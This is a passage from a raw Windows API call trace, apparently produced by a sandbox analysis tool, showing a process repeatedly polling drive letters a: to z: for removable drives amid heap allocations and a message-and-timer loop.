(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.807] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.807] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.807] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.807] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.807] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.807] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.808] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.808] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.808] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.808] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.809] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.810] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.810] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.810] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.810] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.810] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.810] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.811] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.811] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.811] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.811] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.811] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.811] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.811] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.811] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.811] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.811] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0218.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0218.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.813] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.813] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.813] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0218.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.814] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.814] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.814] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.814] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.814] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.814] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.815] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.816] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.816] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.816] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.816] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.817] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.818] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.818] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.818] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0218.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.819] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.819] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.819] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.819] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.819] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.820] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.820] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.820] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.820] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.820] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.821] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.821] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.821] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.821] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.821] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.821] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.821] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.822] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.822] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.822] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.823] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.823] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.823] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.823] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.823] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.824] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.824] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.824] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.824] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.824] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.824] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.825] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.825] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.825] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.825] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.825] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.825] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.826] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0218.826] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.826] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0218.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.827] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0218.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.827] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.827] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.827] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.827] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0218.827] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.827] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.828] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.828] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.828] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.828] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.828] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 